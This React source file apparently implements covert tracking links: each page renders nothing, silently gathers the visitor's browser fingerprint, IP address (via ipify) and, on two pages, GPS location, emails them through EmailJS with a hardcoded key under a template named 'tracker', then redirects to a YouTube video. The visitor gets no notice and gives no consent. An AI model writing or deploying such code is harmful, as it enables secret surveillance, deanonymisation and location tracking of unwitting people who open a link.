import emailjs from "emailjs-com";
import { useEffect } from "react";

const getData = (link, location) => {
    const redirectToYouTube = () => {
        window.location.href = link;
    };

    const userData = {
        userAgent: navigator.userAgent,
        language: navigator.language,
        platform: navigator.platform,
        screenResolution: `${window.screen.width}x${window.screen.height}`,
        viewportResolution: `${window.innerWidth}x${window.innerHeight}`,
        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
        cookiesEnabled: navigator.cookieEnabled,
        javaEnabled: navigator.javaEnabled(),
        online: navigator.onLine,
        hardwareConcurrency: navigator.hardwareConcurrency,
        deviceMemory: navigator.deviceMemory,
        connection: navigator.connection
            ? {
                  downlink: navigator.connection.downlink,
                  effectiveType: navigator.connection.effectiveType,
                  rtt: navigator.connection.rtt,
                  saveData: navigator.connection.saveData,
              }
            : null,
        location: null,
        ipAddress: null,
    };

    const sendEmail = (userData) => {
        const templateParams = {
            userAgent: userData.userAgent,
            language: userData.language,
            platform: userData.platform,
            screenResolution: userData.screenResolution,
            viewportResolution: userData.viewportResolution,
            timezone: userData.timezone,
            cookiesEnabled: userData.cookiesEnabled,
            javaEnabled: userData.javaEnabled,
            online: userData.online,
            hardwareConcurrency: userData.hardwareConcurrency,
            deviceMemory: userData.deviceMemory,
            downlink: userData.connection
                ? userData.connection.downlink
                : "N/A",
            effectiveType: userData.connection
                ? userData.connection.effectiveType
                : "N/A",
            rtt: userData.connection ? userData.connection.rtt : "N/A",
            saveData: userData.connection
                ? userData.connection.saveData
                : "N/A",
            latitude: userData.location ? userData.location.latitude : "N/A",
            longitude: userData.location ? userData.location.longitude : "N/A",
            accuracy: userData.location ? userData.location.accuracy : "N/A",
            ip: userData.ipAddress,
        };

        emailjs
            .send("gmail", "tracker", templateParams, "W7BkGOwN7ytjAPawR")
            .then(
                (response) => {
                    redirectToYouTube();
                },
                (error) => {
                    redirectToYouTube();
                }
            );
    };

    const fetchIpAddress = async () => {
        return new Promise((resolve, reject) => {
            fetch("https://api.ipify.org?format=json")
                .then((response) => response.json())
                .then((data) => {
                    userData.ipAddress = data.ip;
                    resolve();
                })
                .catch(() => {
                    reject();
                });
        });
    };

    const fetchGeolocation = () => {
        if (navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(
                (position) => {
                    userData.location = {
                        latitude: position.coords.latitude,
                        longitude: position.coords.longitude,
                        accuracy: position.coords.accuracy,
                    };
                    sendEmail(userData);
                },
                (error) => {
                    sendEmail(userData);
                }
            );
        } else {
            sendEmail(userData);
        }
    };

    const foo = async () => {
        fetchIpAddress()
            .then(() => {
                if (!location) {
                    sendEmail(userData);
                    return;
                }
                fetchGeolocation();
            })
            .catch(() => {
                if (!location) {
                    sendEmail(userData);
                    return;
                }
                fetchGeolocation();
            });
    };

    foo();
};

export const Page1 = () => {
    const link = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";

    useEffect(() => {
        getData(link, false);
    }, []);

    return <div />;
};

export const Page2 = () => {
    const link = "https://www.youtube.com/watch?v=4L7u4F4cGY0";

    useEffect(() => {
        getData(link, true);
    }, []);

    return <div />;
};

export const Page3 = () => {
    const link = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";

    useEffect(() => {
        getData(link, true);
    }, []);

    return <div />;
};
